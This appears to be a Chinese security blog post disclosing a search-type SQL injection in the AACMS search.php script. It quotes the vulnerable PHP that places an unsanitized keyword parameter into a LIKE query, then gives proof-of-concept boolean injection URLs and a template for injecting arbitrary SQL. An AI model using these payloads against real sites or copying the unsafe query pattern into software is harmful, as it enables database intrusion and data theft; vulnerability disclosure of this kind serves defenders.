AACMS 搜索型注入 - 脚本漏洞

  • A+
所属分类:lcx

   By:匿名者

    表示官方就是 ~~

以下是引用片段:

include_once 'common.php';

$keyword = $_REQUEST['keyword']; //[email protected]#$%^&*

if(empty($keyword)) sexit($lang['arg_error']);
       
$where = '';

$where .= " title LIKE '%{$keyword}%'";//%模糊查询,。

$title = '搜索';

....
       
include template('search');

    POC:

http://127.0.0.1/search.php?keyword=w%'%20and%201=1%20and%20'%'='  //and 1=1

http://127.0.0.1/search.php?keyword=w%'%20and%201=2%20and%20'%'='  //and 1=2

http://127.0.0.1/search.php?keyword={关键字}{SQL}

文章来源于lcx.cc:AACMS 搜索型注入 - 脚本漏洞

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: